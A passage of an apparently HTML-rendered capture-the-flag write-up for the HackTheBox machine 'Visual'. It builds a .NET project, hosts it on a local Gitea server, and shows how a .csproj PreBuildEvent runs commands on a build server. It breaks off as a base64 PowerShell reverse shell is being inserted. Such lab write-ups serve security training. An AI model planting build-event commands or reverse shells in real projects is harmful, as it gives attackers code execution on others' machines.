url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAGCAYAAADDl76dAAAACXBIWXMAAA7DAAAOwwHHb6hkAAABFElEQVR42pWN3U7CQBCF+xTalrYLRduFtdv/2JZSREBrDHih0YDA+7/FcbZCTIw3Xnz5zpzZzGqeZaPIKzyvX9G2GzSzFabNErP5I7J8AsPsQzecjsuT/8IwGXRCmzYrLB7WeNq8Ydm+oJ63yG5nKKp75NUCeXkHmdbEBGH244AcJBVC2omoxNUogT9OoKVCIr+RKIMQmQgQc4HQGyH2x0gIycddF5Mj1XVZICVUjvj3u+Caoz/0oJWco/B91OSK+wRHOnQhHQdpn2Fk24gYQ0ycu4g5yMgqqy4hh9SZPRPa/njEx26H9+0Wu8MBnzQLKXGhGzAsq0Pv9TrO2TjNv7NFe23ounAVgwHOmdGvNi3/izr4Be/IstBcPoPGAAAAAElFTkSuQmCC'); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="visual webpage error message" title="" src="/static/bdde00947a833075d9dcdca938b3fb74/50637/visual-webpage-error-message.png" srcset="/static/bdde00947a833075d9dcdca938b3fb74/dda05/visual-webpage-error-message.png 158w, /static/bdde00947a833075d9dcdca938b3fb74/679a3/visual-webpage-error-message.png 315w, /static/bdde00947a833075d9dcdca938b3fb74/50637/visual-webpage-error-message.png 630w, /static/bdde00947a833075d9dcdca938b3fb74/9f2f1/visual-webpage-error-message.png 731w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>So based on the above, it seemed as though I needed to host a Git repository for the server to successfully fetch the project files. But first, I needed to create a valid project that included a solution (<code class="language-text">.sln</code>) file.</p> <p>To make the project from a Linux machine, I started a Docker container with the <code class="language-text">.NET SDK 6.0</code> image and created a new project with <code class="language-text">dotnet new console</code>:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">┌──(kali㉿kali)-[~/Desktop/HTB/Visual/TestProject] └─$ sudo docker run --rm -it -v `pwd`:/TestProject mcr.microsoft.com/dotnet/sdk:6.0 bash root@bc9c5e2ff2ad:/# ls TestProject boot etc lib media opt root sbin sys usr bin dev home lib64 mnt proc run srv tmp var root@bc9c5e2ff2ad:/# cd TestProject root@bc9c5e2ff2ad:/TestProject# dotnet new console The template "Console App" was created successfully. Processing post-creation actions... Running 'dotnet restore' on /TestProject/TestProject.csproj... Determining projects to restore... Restored /TestProject/TestProject.csproj (in 111 ms). Restore succeeded. root@bc9c5e2ff2ad:/TestProject# ls Program.cs TestProject.csproj obj</code></pre></div> <p>Then, I created a solution file with <code class="language-text">dotnet new sln</code>:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">root@bc9c5e2ff2ad:/TestProject# dotnet new sln The template "Solution File" was created successfully. root@bc9c5e2ff2ad:/TestProject# cat TestProject.sln Microsoft Visual Studio Solution File, Format Version 12.00 # Visual Studio Version 17 VisualStudioVersion = 17.0.31903.59 MinimumVisualStudioVersion = 10.0.40219.1 Global GlobalSection(SolutionConfigurationPlatforms) = preSolution Debug|Any CPU = Debug|Any CPU Release|Any CPU = Release|Any CPU EndGlobalSection GlobalSection(SolutionProperties) = preSolution HideSolutionNode = FALSE EndGlobalSection EndGlobal</code></pre></div> <p>I added <code class="language-text">TestProject.csproj</code> to <code class="language-text">TestProject.sln</code> with <code class="language-text">dotnet sln TestProject.sln add TestProject.csproj</code>:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">root@bc9c5e2ff2ad:/TestProject# dotnet sln TestProject.sln add TestProject.csproj Project `TestProject.csproj` added to the solution. root@bc9c5e2ff2ad:/TestProject# cat TestProject.sln Microsoft Visual Studio Solution File, Format Version 12.00 # Visual Studio Version 17 VisualStudioVersion = 17.0.31903.59 MinimumVisualStudioVersion = 10.0.40219.1 Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "TestProject", "TestProject.csproj", "{F2A51054-6A93-4654-99AF-5F8D97D38E6C}" EndProject Global GlobalSection(SolutionConfigurationPlatforms) = preSolution Debug|Any CPU = Debug|Any CPU Release|Any CPU = Release|Any CPU EndGlobalSection GlobalSection(SolutionProperties) = preSolution HideSolutionNode = FALSE EndGlobalSection GlobalSection(ProjectConfigurationPlatforms) = postSolution {F2A51054-6A93-4654-99AF-5F8D97D38E6C}.Debug|Any CPU.ActiveCfg = Debug|Any CPU {F2A51054-6A93-4654-99AF-5F8D97D38E6C}.Debug|Any CPU.Build.0 = Debug|Any CPU {F2A51054-6A93-4654-99AF-5F8D97D38E6C}.Release|Any CPU.ActiveCfg = Release|Any CPU {F2A51054-6A93-4654-99AF-5F8D97D38E6C}.Release|Any CPU.Build.0 = Release|Any CPU EndGlobalSection EndGlobal</code></pre></div> <p>I built the project with <code class="language-text">dotnet build</code> and ran it with <code class="language-text">dotnet run</code>:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">root@bc9c5e2ff2ad:/TestProject# dotnet build MSBuild version 17.3.4+a400405ba for .NET Determining projects to restore... All projects are up-to-date for restore. TestProject -> /TestProject/bin/Debug/net6.0/TestProject.dll Build succeeded. 0 Warning(s) 0 Error(s) Time Elapsed 00:00:05.22 root@bc9c5e2ff2ad:/TestProject# dotnet run Hello, World!</code></pre></div> <p>Next, to host the project in a Git repository, I used Docker to start an instance of Gitea by doing the following:</p> <p>Pulled the Gitea image:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">┌──(kali㉿kali)-[~/Desktop/HTB/Visual] └─$ sudo docker pull gitea/gitea:latest latest: Pulling from gitea/gitea ec99f8b99825: Pull complete a6f93238fbf9: Pull complete 7ba71f787c2a: Pull complete 7f63cdf32c7d: Pull complete 823f22cebab2: Pull complete 2aebd935eab5: Pull complete 09506ba9f9c2: Pull complete Digest: sha256:1b9dcae47e821b8dd75c1e48d13677c428624d02e683badb461e4947300e7d19 Status: Downloaded newer image for gitea/gitea:latest docker.io/gitea/gitea:latest</code></pre></div> <p>Started the instance and forwarded local port <code class="language-text">3000</code> to <code class="language-text">3000</code> on the container:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">┌──(kali㉿kali)-[~/Desktop/HTB/Visual] └─$ sudo docker run -p 3000:3000 gitea/gitea Generating /data/ssh/ssh_host_ed25519_key... Generating /data/ssh/ssh_host_rsa_key... Generating /data/ssh/ssh_host_ecdsa_key... Server listening on :: port 22. Server listening on 0.0.0.0 port 22. 2024/07/31 11:41:04 cmd/web.go:242:runWeb() [I] Starting Gitea on PID: 17 2024/07/31 11:41:04 cmd/web.go:111:showWebStartupMessage() [I] Gitea version: 1.22.1 built with GNU Make 4.4.1, go1.22.5 : bindata, timetzdata, sqlite, sqlite_unlock_notify 2024/07/31 11:41:04 cmd/web.go:112:showWebStartupMessage() [I] * RunMode: prod 2024/07/31 11:41:04 cmd/web.go:113:showWebStartupMessage() [I] * AppPath: /usr/local/bin/gitea 2024/07/31 11:41:04 cmd/web.go:114:showWebStartupMessage() [I] * WorkPath: /data/gitea 2024/07/31 11:41:04 cmd/web.go:115:showWebStartupMessage() [I] * CustomPath: /data/gitea 2024/07/31 11:41:04 cmd/web.go:116:showWebStartupMessage() [I] * ConfigFile: /data/gitea/conf/app.ini 2024/07/31 11:41:04 cmd/web.go:117:showWebStartupMessage() [I] Prepare to run install page 2024/07/31 11:41:04 cmd/web.go:304:listen() [I] Listen: http://0.0.0.0:3000 2024/07/31 11:41:04 cmd/web.go:308:listen() [I] AppURL(ROOT_URL): http://localhost:3000/ 2024/07/31 11:41:04 ...s/graceful/server.go:50:NewServer() [I] Starting new Web server: tcp:0.0.0.0:3000 on PID: 17</code></pre></div> <p>I visited the Gitea instance at <code class="language-text">http://127.0.0.1:3000</code> which brought up the initial configuration. I clicked <code class="language-text">Install Gitea</code> at the bottom and registered a new user, then I added a new repository:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/9d386c4678d2c96522fa48f911403bba/eba93/gitea-new-repo.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 44.93670886075949%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAJCAYAAAAywQxIAAAACXBIWXMAAAsTAAALEwEAmpwYAAABOklEQVR42p2R627CMAyF+xQD0iZN0vQCFCiFogk6YIjr0NDe/2XO7CBN+wn8+BI5l2P7OFCRRVPVOFy/cbr84Hi+eeaLFpFyEFECIf9BcSQdlM4QmxzaFkiSAtYOoPsrBO12h3a9x25/xepjj0m9RN20xArDcYOsP0VaVH84Ii/nmC3WWG8PaDcHnI9nnD5v2Gy/EJRNH7FLIZSFMilim1ElBtoVCOmM424YoyMU3ghBmJ5ESHsv0jD0rkP39XSBZvaO4LS7UBUjdOmSRR9B0tuEkyY5VVxCaufFwzhBwMuj+C6o4sl8iWHVwKYF2VB6YRYV6klBRpItg/EUxXACQ4LK3m1ieyL9giB/1EnmveNqO0J6QqkpmXtekNu+Dyun+O4dw4Nknhbs0SduczCqfItCGZ+kG9LUpcYvymD/rsFlOnoAAAAASUVORK5CYII='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="gitea new repo" title="" src="/static/9d386c4678d2c96522fa48f911403bba/50637/gitea-new-repo.png" srcset="/static/9d386c4678d2c96522fa48f911403bba/dda05/gitea-new-repo.png 158w, /static/9d386c4678d2c96522fa48f911403bba/679a3/gitea-new-repo.png 315w, /static/9d386c4678d2c96522fa48f911403bba/50637/gitea-new-repo.png 630w, /static/9d386c4678d2c96522fa48f911403bba/eba93/gitea-new-repo.png 903w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>Next, within the project folder for the <code class="language-text">Hello, World!</code> console app, I initialized a Git repo and pushed the code to Gitea:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">┌──(kali㉿kali)-[~/Desktop/HTB/Visual/TestProject] └─$ git init hint: Using 'master' as the name for the initial branch. This default branch name hint: is subject to change. To configure the initial branch name to use in all hint: of your new repositories, which will suppress this warning, call: hint: hint: git config --global init.defaultBranch &lt;name> hint: hint: Names commonly chosen instead of 'master' are 'main', 'trunk' and hint: 'development'. The just-created branch can be renamed via this command: hint: hint: git branch -m &lt;name> Initialized empty Git repository in /home/kali/Desktop/HTB/Visual/TestProject/.git/ ┌──(kali㉿kali)-[~/Desktop/HTB/Visual/TestProject] └─$ git checkout -b main Switched to a new branch 'main' ┌──(kali㉿kali)-[~/Desktop/HTB/Visual/TestProject] └─$ git add . ┌──(kali㉿kali)-[~/Desktop/HTB/Visual/TestProject] └─$ git commit -m "initial commit" [main (root-commit) e80ab55] initial commit 28 files changed, 280 insertions(+) create mode 100644 Program.cs create mode 100644 TestProject.csproj create mode 100644 TestProject.sln create mode 100755 bin/Debug/net6.0/TestProject create mode 100644 bin/Debug/net6.0/TestProject.deps.json create mode 100644 bin/Debug/net6.0/TestProject.dll create mode 100644 bin/Debug/net6.0/TestProject.pdb create mode 100644 bin/Debug/net6.0/TestProject.runtimeconfig.json create mode 100644 obj/Debug/net6.0/.NETCoreApp,Version=v6.0.AssemblyAttributes.cs create mode 100644 obj/Debug/net6.0/TestProject.AssemblyInfo.cs create mode 100644 obj/Debug/net6.0/TestProject.AssemblyInfoInputs.cache create mode 100644 obj/Debug/net6.0/TestProject.GeneratedMSBuildEditorConfig.editorconfig create mode 100644 obj/Debug/net6.0/TestProject.GlobalUsings.g.cs create mode 100644 obj/Debug/net6.0/TestProject.assets.cache create mode 100644 obj/Debug/net6.0/TestProject.csproj.AssemblyReference.cache create mode 100644 obj/Debug/net6.0/TestProject.csproj.CoreCompileInputs.cache create mode 100644 obj/Debug/net6.0/TestProject.csproj.FileListAbsolute.txt create mode 100644 obj/Debug/net6.0/TestProject.dll create mode 100644 obj/Debug/net6.0/TestProject.genruntimeconfig.cache create mode 100644 obj/Debug/net6.0/TestProject.pdb create mode 100755 obj/Debug/net6.0/apphost create mode 100644 obj/Debug/net6.0/ref/TestProject.dll create mode 100644 obj/Debug/net6.0/refint/TestProject.dll create mode 100644 obj/TestProject.csproj.nuget.dgspec.json create mode 100644 obj/TestProject.csproj.nuget.g.props create mode 100644 obj/TestProject.csproj.nuget.g.targets create mode 100644 obj/project.assets.json create mode 100644 obj/project.nuget.cache ┌──(kali㉿kali)-[~/Desktop/HTB/Visual/TestProject] └─$ git remote add origin http://127.0.0.1:3000/test/TestProject.git ┌──(kali㉿kali)-[~/Desktop/HTB/Visual/TestProject] └─$ git push -u origin main Username for 'http://127.0.0.1:3000': test Password for 'http://test@127.0.0.1:3000': Enumerating objects: 33, done. Counting objects: 100% (33/33), done. Delta compression using up to 4 threads Compressing objects: 100% (26/26), done. Writing objects: 100% (33/33), 70.64 KiB | 5.04 MiB/s, done. Total 33 (delta 2), reused 0 (delta 0), pack-reused 0 remote: . Processing 1 references remote: Processed 1 references in total To http://127.0.0.1:3000/test/TestProject.git * [new branch] main -> main branch 'main' set up to track 'origin/main'.</code></pre></div> <p>The project could then be viewed in Gitea:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/0262207b1f1cbb41934b744563ac50e2/51384/gitea-TestProject.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 75.31645569620254%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAPCAYAAADkmO9VAAAACXBIWXMAAA7DAAAOwwHHb6hkAAACeklEQVR42oVT21LbMBD1P0BjWzdLlmUlceLEJgQo0EDKPZQOtK/9jf7+6UoJTKfDlIcze9VqV3uUKGEwH0+wvnvAw+YFt3ffcXP3hPXVBs5PwYQFl5Zk+YZgy8JB6RqF8SjtEGXZQI/OkVx+vcfq4hbXt0+4WN9j1n/GwfI8IujzHabzYwybA/hxj7Y7wfnqGlc3j1hfb/D8SE1cPuNyvUHiZhaF290uDWw9Bi/IV9LtpYfUVZRpLjHYIWUqylzomLeXCZwdr7Doj5EMpzPYYYPRtMO47aGrIVJeIKfiAZkowFS4rISiw8aNoi21ixcFvwgNmDr6k3o8w7Q7jEXtcIKC3qOoRpB0WNIBRXbQDXWurKecKeX4qJu6gTQOJcnXBpLRpEM7P4JQDjmnB1dV1AO4JJ3AX22K8Wj/BbkFo0UFO8mshBhrVB110hikjiOteNRt52NsULHoU00J2w/BvELmBAaWoepH8IsGWS2Q2wKJ7iq4MxpzUcIsaQGH9FYLA3NUQZMuD0z0sTktYSYgOgVGMt+Bkx3RKxStQ7L48Ruz9S9IVsDVMzg3RV23hKC3EIJG4sRDVr6LPC9j3Jhx5GbybfMTp1+uMF+e4PB0BT9piW8tbdMTfcyHYErT9mnKUROXlZTNEto1MJUnynjiF70Nk5S8pUkuC+xnDJ9y/i5CLJfER0usMLQU6eeRHikT2E/pICFIQQUDJwN5oz/j7yLEQk5oZltQ29hdUToqKt8SmTJQxLGMSP5RwUwomsbFX5VIYri2W4Ti+7sOGY0Rbsy4wt4gf/P/ixBLKSfkhh+TiPBXrY/jha+Tcx1HePXz4BP6vwg5ITf8mj9PgqcLEOa+xgAAAABJRU5ErkJggg=='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="gitea TestProject" title="" src="/static/0262207b1f1cbb41934b744563ac50e2/50637/gitea-TestProject.png" srcset="/static/0262207b1f1cbb41934b744563ac50e2/dda05/gitea-TestProject.png 158w, /static/0262207b1f1cbb41934b744563ac50e2/679a3/gitea-TestProject.png 315w, /static/0262207b1f1cbb41934b744563ac50e2/50637/gitea-TestProject.png 630w, /static/0262207b1f1cbb41934b744563ac50e2/51384/gitea-TestProject.png 843w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>I went back to Visual and submitted the repo URL:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 464px; " > <a class="gatsby-resp-image-link" href="/static/6bec9723dea9227ff16af3c5437a852a/d85e0/visual-webpage-form-git-repo.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 70.25316455696203%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAOCAYAAAAvxDzwAAAACXBIWXMAAA7DAAAOwwHHb6hkAAABj0lEQVR42q2SO04DMRCGcxIabpBjUHIBGs6AhCihRkgRoosUiRIBNRJpkKAjFYqy5EX2FfIAkuzDa3v2x96wIYFNSIGlf8c7M/5mRnYOS1YcT631HuPyMcZ1JUZvEi/EslZOf4jolyJBOoLSPWH7jLBVIFxVpj4uKPPMDBhxARbxBU2CSEdwWubIHxHyh4TzB574PBX7mc+FWA7U//yrwyeHcHJLKJQJjZ5MfJGQ6wP1fuL5cLuvcLo9DAY9+OM+Qm+Y7C3bxWD4hiBk6wPHEw81ow7DeEaj9YK26aBqNNFqm6hWazDqjQQYrQKGbG5kJaHG4kqpTSUkKclZcW1DFmV36Pk+OqYFy7JhO64az4brOrBtE+1WU1lLyU3iHdOEo3JCxrKBaYd+ECbjaOnkkcfQ/2AYjBjGno6F0xwlzw9WdzgvXYAkx05RYvOAsLFP2LvQt8wRML4w8p/PJgVKwXF8I7Bbkgm4eKcOxd/Atd/hvHSXMSkpkJR8ad4CUN+admSJqWLRnJblacYM+J/rE10HNgUnEXSSAAAAAElFTkSuQmCC'); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="visual webpage form git repo" title="" src="/static/6bec9723dea9227ff16af3c5437a852a/d85e0/visual-webpage-form-git-repo.png" srcset="/static/6bec9723dea9227ff16af3c5437a852a/dda05/visual-webpage-form-git-repo.png 158w, /static/6bec9723dea9227ff16af3c5437a852a/679a3/visual-webpage-form-git-repo.png 315w, /static/6bec9723dea9227ff16af3c5437a852a/d85e0/visual-webpage-form-git-repo.png 464w" sizes="(max-width: 464px) 100vw, 464px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>The build succeeded:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/65dc8e2ea42b24c6591500da15f6cde5/d2eea/visual-build-succeeded.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 76.58227848101265%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAPCAYAAADkmO9VAAAACXBIWXMAAA7DAAAOwwHHb6hkAAABvElEQVR42qWT646bMBBGeYoEg/EGMJcAuRESriElWZKudlW1atPtRX3/x/g6sKtoValSSX8cjcHW8czYVkZjjqXtQfou3CBEGK0RzmI43gzSi2DaUzw8fsKHjxcc2yfs9ifUxOH+EX6wAtPNKxqhNMeHflEX2/MT9s17VHWLOC6xWhXIyiPNn5FX99jmzZW0OGCTvUOy3WNNJOke4TyFsooTrDdbJJsUm22KeJ1gvlxhsYhJuIZ0PJiW/AsOVeD00eqjhJKQsD20qMsaTd2gLnbYFRXyPMP5dILv+1BVFZzr0HXtDX9+v/xTNItBDUdgwRjMV8FCigGDpmlgTCORAcP4dxTuCLClTVBjFxOweAItEjAGiq5C484Cd2bgMgS3w35sTBya5LcJhWlBn0bQvQDc9SGE8Yq4CcUgIfcoM5eEjk/ZmTfL3gijq1D0wv/MUPdJSCV3ZfcZ0hUR1I+eocKuh8aUDsIPIbwpRJclXWZDEpY9XKiLO4wtl3AwnliExMiU0LoW2O7g01aKPMevnz9w+fIZXy8XfHt+xndiHkXQGOt3HSQMggBlVSHLMnpuOcqy7JFS9q+Fcz6I309jq1qHsXUaAAAAAElFTkSuQmCC'); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="visual build succeeded" title="" src="/static/65dc8e2ea42b24c6591500da15f6cde5/50637/visual-build-succeeded.png" srcset="/static/65dc8e2ea42b24c6591500da15f6cde5/dda05/visual-build-succeeded.png 158w, /static/65dc8e2ea42b24c6591500da15f6cde5/679a3/visual-build-succeeded.png 315w, /static/65dc8e2ea42b24c6591500da15f6cde5/50637/visual-build-succeeded.png 630w, /static/65dc8e2ea42b24c6591500da15f6cde5/d2eea/visual-build-succeeded.png 688w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>The build process of a Visual Studio project can be leveraged to get command execution on the target machine due to the option to specify <a href="https://learn.microsoft.com/en-us/visualstudio/ide/how-to-specify-build-events-csharp?view=vs-2022" target="_blank">build events</a> which are used to run commands before the build starts or after the build finishes.</p> <p>For example, going back to the project files in the docker container, this was the default <code class="language-text">TestProject.csproj</code> after running <code class="language-text">dotnet new console</code>:</p> <div class="gatsby-highlight" data-language="csharp"><pre class="language-csharp"><code class="language-csharp"><span class="token operator">&lt;</span><span class="token class-name">Project</span> Sdk<span class="token operator">=</span><span class="token string">"Microsoft.NET.Sdk"</span><span class="token operator">></span> <span class="token operator">&lt;</span>PropertyGroup<span class="token operator">></span> <span class="token operator">&lt;</span>OutputType<span class="token operator">></span>Exe<span class="token operator">&lt;</span><span class="token operator">/</span>OutputType<span class="token operator">></span> <span class="token operator">&lt;</span>TargetFramework<span class="token operator">></span>net6<span class="token punctuation">.</span><span class="token number">0</span><span class="token operator">&lt;</span><span class="token operator">/</span>TargetFramework<span class="token operator">></span> <span class="token operator">&lt;</span>ImplicitUsings<span class="token operator">></span>enable<span class="token operator">&lt;</span><span class="token operator">/</span>ImplicitUsings<span class="token operator">></span> <span class="token operator">&lt;</span>Nullable<span class="token operator">></span>enable<span class="token operator">&lt;</span><span class="token operator">/</span>Nullable<span class="token operator">></span> <span class="token operator">&lt;</span><span class="token operator">/</span>PropertyGroup<span class="token operator">></span> <span class="token operator">&lt;</span><span class="token operator">/</span>Project<span class="token operator">></span></code></pre></div> <p>Running <code class="language-text">dotnet build</code> showed the following:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 526px; " > <a class="gatsby-resp-image-link" href="/static/d68c115c097031fb1efe413ec4bd0287/aae1f/dotnet-build.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 33.54430379746836%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAHCAYAAAAIy204AAAACXBIWXMAAA7DAAAOwwHHb6hkAAABCUlEQVR42pVRSVLDQAz0UyCL4333eN9jO5Aq8v/XNJJIAAMXDl0taUY9LY02rzc03Yq6XYgXlPUZKu9RNTPG8xXd8CK1qp2F+Z5hxdgdXOyP3i9oy+WGrr9Icz++oqWYxYpqwjBdMa9vIuL6OcKogm6EeNrZeN47Gzwe0GpqbsnhSM1ZPiBRrYiya2YWY2ctOe0JWTHAI/EgKuUBZi/ICcWHoEWJ6aZgNjwF3Qxh2gksJ4HtpBTHFKdwvExc2q4ipHdWUuec74ugE1dIyxFpMyEfVth+9jnCd2xG5HxTc79GZnUeoygn+YzjKZCDn0s/6L7gr4/YfEqU1LKLkDggt+q+R97JQ/w/eAe6jtxXqPS4YwAAAABJRU5ErkJggg=='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="dotnet build" title="" src="/static/d68c115c097031fb1efe413ec4bd0287/aae1f/dotnet-build.png" srcset="/static/d68c115c097031fb1efe413ec4bd0287/dda05/dotnet-build.png 158w, /static/d68c115c097031fb1efe413ec4bd0287/679a3/dotnet-build.png 315w, /static/d68c115c097031fb1efe413ec4bd0287/aae1f/dotnet-build.png 526w" sizes="(max-width: 526px) 100vw, 526px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>A pre-build event can be added using the <code class="language-text">&lt;PreBuildEvent></code> tag within the <code class="language-text">.csproj</code> file that will run commands or scripts before the build starts. So I edited <code class="language-text">TestProject.csproj</code> and added the <code class="language-text">&lt;PreBuildEvent></code> tag with the <code class="language-text">whoami</code> command:</p> <div class="gatsby-highlight" data-language="csharp"><pre class="language-csharp"><code class="language-csharp"><span class="token operator">&lt;</span><span class="token class-name">Project</span> Sdk<span class="token operator">=</span><span class="token string">"Microsoft.NET.Sdk"</span><span class="token operator">></span> <span class="token operator">&lt;</span>PropertyGroup<span class="token operator">></span> <span class="token operator">&lt;</span>OutputType<span class="token operator">></span>Exe<span class="token operator">&lt;</span><span class="token operator">/</span>OutputType<span class="token operator">></span> <span class="token operator">&lt;</span>TargetFramework<span class="token operator">></span>net6<span class="token punctuation">.</span><span class="token number">0</span><span class="token operator">&lt;</span><span class="token operator">/</span>TargetFramework<span class="token operator">></span> <span class="token operator">&lt;</span>ImplicitUsings<span class="token operator">></span>enable<span class="token operator">&lt;</span><span class="token operator">/</span>ImplicitUsings<span class="token operator">></span> <span class="token operator">&lt;</span>Nullable<span class="token operator">></span>enable<span class="token operator">&lt;</span><span class="token operator">/</span>Nullable<span class="token operator">></span> <span class="token operator">&lt;</span>PreBuildEvent<span class="token operator">></span>whoami<span class="token operator">&lt;</span><span class="token operator">/</span>PreBuildEvent<span class="token operator">></span> <span class="token operator">&lt;</span><span class="token operator">/</span>PropertyGroup<span class="token operator">></span> <span class="token operator">&lt;</span><span class="token operator">/</span>Project<span class="token operator">></span></code></pre></div> <p>When I built the project again, the <code class="language-text">whoami</code> command ran before the build started:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 525px; " > <a class="gatsby-resp-image-link" href="/static/4cb8354082dfa9eff32d060be792b4d6/65f66/dotnet-build-with-pre-build-event.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 36.708860759493675%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAHCAYAAAAIy204AAAACXBIWXMAAAsTAAALEwEAmpwYAAABD0lEQVR42pWRS3KDMBBEuUliCDYBBAIkxEf8C38WqRwi9z9DZ0ZJXFkkCy9ejTQjutXC64cd++Udnd1gxzMs7etmhmkXt9/2NwzTBU23QZsJbb8hzWoEYfYnnqDhMl8x0Mfjd2WhtlthSJjX03JDqQaIvCExg6dDjEOQwn8R98o4QX2S+FivONcjSjMjly2K0kLpEYp6lR5QVNZVvjX34lQ7EkZoRHGF10QhJC0vOuVocwMpaiTkzk0+kBcd0bpbsYksOxLuXV+62RdsxvOMOEYFvGNGbsqi6GaUdiU2hJGEH4h7FBft95pi/hv52U+co3s/evy6mdzg58CjePzHGEGxM4rHEWXZuwhxqh4W/AQeQtq6aEAJrAAAAABJRU5ErkJggg=='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="dotnet build with pre-build event" title="" src="/static/4cb8354082dfa9eff32d060be792b4d6/65f66/dotnet-build-with-pre-build-event.png" srcset="/static/4cb8354082dfa9eff32d060be792b4d6/dda05/dotnet-build-with-pre-build-event.png 158w, /static/4cb8354082dfa9eff32d060be792b4d6/679a3/dotnet-build-with-pre-build-event.png 315w, /static/4cb8354082dfa9eff32d060be792b4d6/65f66/dotnet-build-with-pre-build-event.png 525w" sizes="(max-width: 525px) 100vw, 525px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>To get a shell on Visual, I edited the <code class="language-text">&lt;PreBuildEvent></code> tag in <code class="language-text">TestProject.csproj</code> to contain the PowerShell #3 (Base64) reverse shell payload from <a href="https://www.revshells.com/" target="_blank">revshells</a>:</p> <div class="gatsby-highlight" data-language="csharp"><pre class="language-csharp"><code class="language-csharp"><span class="token operator">&lt;</span><span class="token class-name">Project</span> Sdk<span class="token operator">=</span><span class="token string">"Microsoft.NET.Sdk"</span><span class="token operator">></span> <span class="token operator">&lt;</span>PropertyGroup<span class="token operator">></span> <span class="token operator">&lt;</span>OutputType<span class="token operator">></span>Exe<span class="token operator">&lt;</span><span class="token operator">/</span>OutputType<span class="token operator">></span> <span class="token operator">&lt;</span>TargetFramework<span class="token operator">></span>net6<span class="token punctuation">.</span><span class="token number">0</span><span class="token operator">&lt;</span><span class="token operator">/</span>TargetFramework<span class="token operator">></span> <span class="token operator">&lt;</span>ImplicitUsings<span class="token operator">></span>enable<span class="token operator">&lt;</span><span class="token operator">/</span>ImplicitUsings<span class="token operator">></span> <span class="token operator">&lt;</span>Nullable<span class="token operator">></span>enable<span class="token operator">&lt;</span><span class="token operator">/</span>Nullable<span class="token operator">></span> <span class="token operator">&lt;</span>PreBuildEvent<span class="token operator">></span>powershell <span class="token operator">-</span>e 